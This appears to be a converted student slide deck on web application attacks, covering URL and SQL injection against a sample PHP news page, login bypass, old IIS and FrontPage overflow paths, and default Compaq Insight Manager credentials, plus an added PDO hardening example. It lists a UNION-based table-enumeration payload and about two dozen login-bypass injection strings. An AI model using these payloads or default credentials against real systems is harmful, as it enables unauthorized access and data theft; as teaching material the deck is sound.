Team :
-
(1312530247)
Ronny Tanjung
Wirawan Satyadi
(1311530230)
Muhammad Fahmi
(1312530148)
(1311530404)
Bayu Laksono
Rian Nurjaman
Husein Allmasyhur
Rudi Fredrick
(1311530263)
(1311530396)
(1311530107)
(1311530123)
(1311530214)
(0911530335)
[Diagram: web application architecture. Components shown: firewall; web server (Apache, IIS, Netscape, etc.); plugins (Perl, C/C++, JSP, etc.); web apps; database connection (ADO, ODBC, etc.); SQL database (DB). HTTP reply: HTML, Javascript, VBscript, etc.]
Utility of Firewalls
Hacks on OS network services prevented by firewalls.
[Diagram: wu-ftpd (X), Sun RPC (X), NT ipc$; web server, web apps, DB]
URL Interpretation Attacks.
Web server misconfiguration.
[Diagram: web client, web server, web apps]
Input Validation attacks.
Poor checking of user inputs.
[Diagram: web client, web server, web apps, DB; also labelled: URL Interpretation attacks]
SQL Query Poisoning
Extend SQL statements.
[Diagram: web client, web server, web apps, DB; also labelled: URL Interpretation attacks, Input Validation attacks]
HTTP session hijacking.
Impersonation.
[Diagram labels: URL Interpretation attacks, Input Validation attacks, SQL query poisoning]
URL Injection
Client Side
URL :
http://localhost/ronie/uas/index.php?status=detail&id=40
Server Side
$ID = $_GET['id'];
$hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc");
URL Injection
Client Side
URL :
http://localhost/ronie/uas/index.php?status=detail&id=40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
Server Side
SELECT * FROM news WHERE ID = 40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- order by id desc
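How the server-side lookup above can be hardened, as an added example that is not code from the original slides: the id parameter is validated as an integer and bound through a prepared statement. PDO with an in-memory SQLite database, the helper function names and the single news row are assumptions made so the example runs offline.

```php
<?php
// Added example, not the original application's code.
// Assumptions: PDO with an in-memory SQLite database; constructed table and row.

function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO news (id, title) VALUES (40, 'Constructed headline')");
    return $db;
}

// The pattern from the slide: the raw parameter becomes part of the SQL text.
// Only the resulting string is built here; it is never executed.
function build_query_unsafe(string $id): string {
    return "SELECT * FROM news WHERE ID = $id order by id desc";
}

// Hardened lookup: accept only a positive integer, then bind it as a value
// so the SQL text is fixed before any user input is seen.
function fetch_news(PDO $db, string $rawId): array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, title FROM news WHERE id = :id ORDER BY id DESC');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = open_demo_db();
$inputs = [
    '40',
    // The id value from the slide's second URL.
    '40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--',
];
foreach ($inputs as $raw) {
    echo "unsafe SQL text: ", build_query_unsafe($raw), "\n";
    try {
        echo "hardened result: ", json_encode(fetch_news($db, $raw)), "\n";
    } catch (InvalidArgumentException $e) {
        echo "hardened result: rejected (", $e->getMessage(), ")\n";
    }
}
```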
SQL Injection
MySQL Application
[Diagram: user Bob, Internet, APACHE Server running login_script2.php, MYSQL LIBRARY, My SQL Server]
Bob
Password: MyPass123
login_script2.php: Select * from User_Table where user=%user and pass=%pass
My SQL Server: Select * from User_Table where user=Bob and pass=MyPass123
MySQL Injection
[Diagram: Username and Password fields, Internet, APACHE Server running login_script2.php, MYSQL LIBRARY, My SQL Server]
Username: or 1=1--
Password:
login_script2.php: Select * from User_Table where user=%user and pass=%pass
My SQL Server: Select * from User_Table where users= or 1=1-- and pass=
Login box
A common query:
SELECT * from table WHERE id=$id
We could inject some malicious query in this way:
http://www.host.com/file?id="malicious_code"
' or 'x'='x
" or "a"="a
hi') or ('a'='a
' or 0=0 --
" or "x"="x
') or ('a'='a
hi") or ("a"="a
" or 0=0 --
') or ('x'='x
") or ("a"="a
or 0=0 --
' or 1=1--
hi" or "a"="a
' or 0=0 #
" or 1=1--
hi" or 1=1 --
" or 0=0 #
or 1=1--
hi' or 1=1 --
or 0=0 #
' or a=a--
hi' or 'a'='a
Directory Browsing
Application Default
Printer Buffer Overflow
http://www.zzzz.com/null.printer
FrontPage Server Extensions Buffer Overflow
http://www.zzzz.com/_vti_bin/_vti_aut/fp30reg.dll
Compaq Insight Manager (CIM)
http://www.zzzz.com:2301
username:password
administrator:administrator
administrator:[Null]
operator:operator
Statistics
/usage, /stat, /webstat, /wwwstats
Search Queries
THE END